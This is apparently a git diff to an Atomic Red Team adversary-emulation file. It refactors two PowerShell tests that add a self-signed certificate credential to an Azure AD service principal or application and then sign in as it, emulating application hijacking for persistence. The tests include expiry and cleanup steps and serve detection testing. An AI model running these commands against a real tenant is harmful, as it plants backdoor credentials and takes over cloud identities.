diff --git a/atomics/T1098.001/T1098.001.yaml b/atomics/T1098.001/T1098.001.yaml index b203d66d..ff5c5d8d 100644 --- a/atomics/T1098.001/T1098.001.yaml +++ b/atomics/T1098.001/T1098.001.yaml @@ -22,14 +22,6 @@ atomic_tests: description: Name of the targeted service principal type: string default: SuperSP - certificate_password: - description: Password of the new certificate - type: string - default: Passw0rd - path_to_cert: - description: Path of the new certificate, locally stored - type: string - default: $env:TEMP dependency_executor_name: powershell dependencies: - description: | @@ -49,21 +41,18 @@ atomic_tests: if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit } # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long - $certNotAfter = (Get-Date).AddDays(2) $credNotAfter = (Get-Date).AddDays(1) - $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint - Write-Host "Generated certificate ""$thumb""" - $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText - Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd > $null + $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry - $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd) + $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) + Write-Host "Generated certificate ""$($cert.Thumbprint)""" New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter Start-Sleep -s 30 $tenant = Get-AzureADTenantDetail - $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb + $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" Write-Host "End of Hijacking" @@ -82,7 +71,6 @@ atomic_tests: } } Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item - rm "#{path_to_cert}\#{service_principal_name}.pfx" -ErrorAction Ignore name: powershell elevation_required: false @@ -107,14 +95,6 @@ atomic_tests: description: Name of the targeted application type: string default: SuperApp - certificate_password: - description: Password of the new certificate - type: string - default: Passw0rd - path_to_cert: - description: Path of the new certificate, locally stored - type: string - default: $env:TEMP dependency_executor_name: powershell dependencies: - description: | @@ -134,21 +114,18 @@ atomic_tests: if ($app -eq $null) { Write-Warning "Application not found"; exit } # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long - $certNotAfter = (Get-Date).AddDays(2) $credNotAfter = (Get-Date).AddDays(1) - $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint - Write-Host "Generated certificate ""$thumb""" - $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText - Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd > $null + $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry - $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd) + $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) + Write-Host "Generated certificate ""$($cert.Thumbprint)""" New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter Start-Sleep -s 30 $tenant = Get-AzureADTenantDetail - $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb + $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $cert.Thumbprint Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" Write-Host "End of Hijacking" cleanup_command: | @@ -166,7 +143,6 @@ atomic_tests: } } Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item - rm "#{path_to_cert}\#{application_name}.pfx" -ErrorAction Ignore name: powershell elevation_required: false - name: AWS - Create Access Key and Secret Key